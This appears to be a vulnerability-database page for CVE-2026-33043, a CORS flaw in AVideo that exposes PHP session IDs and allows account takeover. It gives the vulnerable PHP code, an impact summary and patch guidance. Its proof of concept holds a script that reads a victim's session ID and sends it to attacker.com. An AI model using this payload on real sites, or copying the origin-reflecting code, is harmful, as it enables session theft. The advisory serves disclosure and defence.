Cors Misconfiguration
CVE-2026-33043
HIGH
Severity by source
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
/objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin() function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true, enabling cross-origin session theft and full account takeover.
Details
File: objects/phpsessionid.json.php
allowOrigin();
$obj = new stdClass();
$obj->phpsessid = session_id();
echo _json_encode($obj);No authentication is required. The allowOrigin() function in objects/functions.php (line ~2648) reflects the request Origin:
$HTTP_ORIGIN = empty($_SERVER['HTTP_ORIGIN']) ? @$_SERVER['HTTP_REFERER'] : $_SERVER['HTTP_ORIGIN'];
header("Access-Control-Allow-Origin: " . $HTTP_ORIGIN);
header("Access-Control-Allow-Credentials: true");This means any external website can make a credentialed cross-origin request and read the session ID.
PoC
An attacker hosts the following page:
<script>
fetch('https://TARGET/objects/phpsessionid.json.php', {
credentials: 'include'
})
.then(r => r.json())
.then(d => {
// d.phpsessid = victim's session ID
document.location = 'https://attacker.com/steal?sid=' + d.phpsessid;
});
</script>When a logged-in AVideo user visits the attacker's page, their PHP session ID is stolen via the permissive CORS policy, allowing the attacker to hijack their session.
Impact
Account Takeover - Any logged-in user (including administrators) who visits an attacker-controlled page will have their session stolen. The attacker can then impersonate them with full privileges.
AnalysisAI
AVideo (WWBN_AVideo) contains a critical CORS misconfiguration vulnerability that exposes PHP session IDs to any unauthenticated external website, enabling complete account takeover of any logged-in user including administrators. The vulnerability has a working proof-of-concept exploit and requires only that a victim visit an attacker-controlled webpage while logged into AVideo, making it highly exploitable with an 8.1 CVSS score.
Technical ContextAI
The vulnerability exists in AVideo (CPE: pkg:composer/wwbn_avideo), an open-source video platform built in PHP. The root cause is a CWE-942 (Permissive Cross-domain Policy with Credentials) flaw where the /objects/phpsessionid.json.php endpoint explicitly returns the current PHP session ID without authentication, while the allowOrigin() function reflects any Origin header in the Access-Control-Allow-Origin response header with credentials enabled. This violates same-origin policy protections and allows cross-origin requests to read sensitive session data that should be isolated to the application's domain.
RemediationAI
Apply the vendor-provided patch available at https://github.com/WWBN/AVideo/commit/9f4f51e5df5e3343400f9d0068705f5482b6f930 which addresses the CORS misconfiguration. Until patching is possible, implement a web application firewall rule to block external access to /objects/phpsessionid.json.php or configure the web server to deny requests to this endpoint from non-local origins. Additionally, implement SameSite cookie attributes on session cookies as a defense-in-depth measure. Full remediation details are available in the GitHub advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-qc3p-398r-p59j.
More in Cors Misconfiguration
View allCasdoor is a UI-first Identity and Access Management (IAM) / Single-Sign-On (SSO) platform. Rated high severity (CVSS 8.
In Eclipse Theia 0.3.9 to 1.8.1, the "mini-browser" extension allows a user to preview HTML files in an iframe inside th
Bruno is an open source IDE for exploring and testing APIs. Rated high severity (CVSS 8.7), this vulnerability is no aut
memos is a privacy-first, lightweight note-taking service. Rated high severity (CVSS 8.1), this vulnerability is remotel
SCG Policy Manager, all versions, contains an overly permissive Cross-Origin Resource Policy (CORP) vulnerability. Rated
In Directus before 9.7.0, the default settings of CORS_ORIGIN and CORS_ENABLED are true. Rated critical severity (CVSS 9
A malicious website could have learned the size of a cross-origin resource that supported Range requests. Rated critical
Remote code execution in SiYuan desktop application (versions prior to 3.6.2) allows unauthenticated remote attackers to
Permissive CORS policy in ericc-ch copilot-api up to version 0.7.0 allows remote attackers to access the Token Endpoint
Cross-origin data exposure in Google's MCP Toolbox for Databases stems from the SSE initialization handler unconditional
Cross-origin data theft in LightRAG server versions prior to 1.5.4 allows any malicious website to make authenticated, c
Same-origin policy bypass in the DOM: Networking component. This vulnerability was fixed in Firefox 151.
Same technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-qc3p-398r-p59j